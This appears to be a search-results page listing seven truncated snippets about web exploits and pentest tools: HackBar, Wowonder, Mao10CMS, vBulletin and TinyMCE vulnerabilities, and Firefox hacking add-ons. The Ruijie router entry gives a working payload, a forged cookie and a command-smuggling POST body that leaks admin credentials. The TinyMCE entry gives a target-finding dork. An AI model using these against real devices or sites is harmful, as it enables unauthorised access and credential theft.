7 matches found
HackBar - HackBar Plugin For Burpsuite
HackBar - HackBar Plugin For Burpsuite V1.0. Requirements: Burpsuite, Java. How to install: download the Jar from 'https://github.com/d3vilbug/HackBar/releases/tag/1.0' and add it in Burpsuite. Tested on: Burpsuite 1.7.36, Windows 10, xubuntu 18.04. Upcoming features/modules: Ctrl + H shortcut, WAF bypass, SQLi...
Wowonder CMS - Privilege Escalation Vulnerability
Exploit for php platform in category web applications. Today I will explain an exploit of Privilege Escalation in Wowonder CMS. First we need Firefox v56.0.2 or earlier and then download hackbar: https://addons.mozilla.org/es/firefox/addon/hackbar/ Note: If the bar does not appear, press F9 to mak...
Mao10CMS /Application/Control/Controller/WeixinController.class.php SQL Injection Vulnerability
/Application/Control/Controller/WeixinController.class.php: if ($tmpStr == $signature) echo $echostr; $postStr = $GLOBALS["HTTP_RAW_POST_DATA"]; if (!empty($postStr)) $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA); $fromUsername = $postObj->FromUserName; $toUsername =...
Ruijie Router NBR Information Disclosure Vulnerability
Use ModifyHeaders to change the Cookie header to: auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest; then use Hackbar to send a POST request to: http://localhost/WEBVMS/LEVEL15/ with the body: command=show%20webmaster%20users%0D%0A&strurl=exec%04&mode=%02PRIVEXEC&signname=Red-Giant. This returns the admin account and password. #!/usr/bin/env python # coding: utf-8 import re from pocsuite.net import req fr...
vBulletin 4.x.x visitormessage.php Remote Code Injection Vulnerability
You can get access from vbulletin forum, just inject php code in one file. + My Homepage: black-hg.org / nasirpour.info + Discovered By: Dariush Nasirpour Net.Edit0r + Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my friends bhg...
11 Firefox Add-ons to Hack and PenTest
1. Tamper Data: Tamper Data is a great tool to view and modify HTTP/HTTPS headers and POST parameters. We can alter each request going from our machine to the destination host with this. Thus it helps in security testing web applications by modifying POST parameters. It can be used in performing XS...
TinyMCE Ajax File Manager Remote Code Execution
Exploit Title : tinymce Ajax File Manager Remote Code Author : By onestree Software Link : http://www.phpletter.com/Demo/Tinymce-Ajax-File-Manager/ tested : windows 7 Dork : inurl:"/plugins/filemanager/" or...